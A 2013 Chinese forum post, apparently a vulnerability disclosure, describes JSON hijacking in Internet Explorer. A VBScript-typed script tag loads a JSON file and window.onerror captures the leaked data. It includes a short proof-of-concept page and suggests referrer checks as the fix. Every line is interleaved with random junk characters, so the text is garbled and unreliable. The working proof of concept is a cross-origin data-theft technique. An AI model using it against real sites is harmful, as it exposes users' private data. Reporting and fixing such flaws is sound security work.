简要描述:
# n: H# X) i( S* U/ v$ H
) Q) c' ?4 k/ l3 X由于某些资源容器对数据处理不当导致json劫持漏洞.
/ |! s4 C; M& b V" z% Z详细说明:* B. |, @+ r' A! l
由于ie支持vbscript,所以script元素可以指定成vbscript语言:5 [; J8 x. |3 d: ]8 E+ [8 k
<script language=vbscript></script>. R# k4 E0 i! n$ B% |
; r- M( o* P/ q3 i2 T8 i( X% D
当但我们指定的是一个js格式的文件是将会发现一个异常,这使我们通过捕获这个异常的信息来获得部分json数据.! h9 T- d: x! z5 D0 X$ x
漏洞证明:8 O9 Y( c, I! W& ~; c! I
<script>
, ]+ [# Z+ j9 P% }window.onerror=function(_){
6 m& p( a- i4 dalert(_)9 z/ A. f1 g! l" z& l- }# x
}
/ N! r0 e1 A& `7 R1 b% Z( @</script>
7 ]- H O6 v! ]7 d# p<script language=vbscript src=1.json></script>' G) f1 k l5 y0 a: ?
, V9 H- x; j% E% L5 t& Y# C
7 K8 F1 U, ]& \: ]9 d# g1.json:
9 {9 ^9 r l$ D( u3 G. x4 T[{"name":"sogili","age":19}]" Q7 L' ~3 E# T9 L
修复方案:
0 U t" |& j! `% S% ~, t网站业务对于这个问题可以通过验证referrer是否为同源来防御 |
发表于 2013-2-23 11:33:57
收藏
支持
反对